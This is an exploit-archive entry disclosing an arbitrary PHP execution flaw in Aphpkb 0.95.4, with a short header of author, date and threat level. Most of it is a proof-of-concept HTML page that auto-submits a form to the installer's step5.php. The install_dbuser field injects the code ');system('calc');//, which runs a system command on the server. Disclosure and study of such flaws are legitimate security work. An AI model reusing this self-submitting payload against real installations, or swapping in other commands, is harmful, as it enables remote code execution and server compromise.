Aphpkb 0.95.4 PHP Execution



EKU-ID: 283 CVE: OSVDB-ID:
Author: AutoSec Tools Published: 2011-05-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<!------------------------------------------------------------------------
# Software................Aphpkb 0.95.4
# Vulnerability...........Arbitrary PHP Execution
# Threat Level............Very Critical (5/5)
# Download................http://aphpkb.sourceforge.net/
# Discovery Date..........5/18/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
# 
# 
# --PoC-->

<!-- Access any page after submitting this form -->
<html>
    <body onload="document.forms[0].submit()"> 
        <form method="POST" action="http://localhost/aphpkb/install/step5.php">  
            <input type="hidden" name="install_dbuser" value="');system('calc');//" />   
            <input type="submit" name="submit" />   
        </form>   
    </body>
</html>